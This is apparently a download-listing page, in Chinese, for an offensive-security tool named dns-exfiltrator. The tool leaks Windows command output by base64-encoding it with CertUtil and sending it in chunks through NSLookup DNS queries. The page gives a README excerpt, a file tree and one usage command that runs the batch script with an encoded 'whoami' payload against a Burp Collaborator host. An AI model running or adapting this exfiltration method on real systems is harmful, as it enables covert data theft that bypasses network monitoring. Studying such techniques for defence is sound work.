文件名称:dns-exfiltrator:通过DNS查询提取数据。 基于CertUtil和NSLookup
文件大小:596KB
文件格式:ZIP
更新时间:2024-05-12 12:44:23
security batch wireshark offensive-security ethical-hacking
DNS提取器 通过DNS查询提取数据。 基于CertUtil和NSLookup。 命令输出将使用CertUtil以Base64编码进行编码,并使用NSLookup每次查询最多以63个字符为大块进行输出。 用于泄漏命令输出的批处理脚本已在Windows 10 Enterprise OS(64位)上进行了测试。 用于解码有效负载的Bash脚本已在Kali Linux v2020.3(64位)上进行了测试。 出于教育目的。 希望对您有所帮助! 要做的事情:使整个批处理脚本成为一个线性。 要做的事情:完成项目。 怎么跑 要做的事情:使本节更加清楚。 从打开命令提示符,然后运行以下命令: dns_exfiltrator.bat d2hvYW1p xyz.burpcollaborator.net 您的命令必须是采用Base64编码的批处理单行代码,例如d2hvYW1pICYmIG5ld
【文件预览】:
dns-exfiltrator-main
----.gitattributes(66B)
----src()
--------dns_payload_extractor.sh(4KB)
--------dns_exfiltrator.bat(2KB)
----img()
--------wireshark_burp.jpg(286KB)
--------save_wireshark_tcp_stream.jpg(252KB)
--------dns_exfiltration.jpg(188KB)
----LICENSE(1KB)
----README.md(2KB)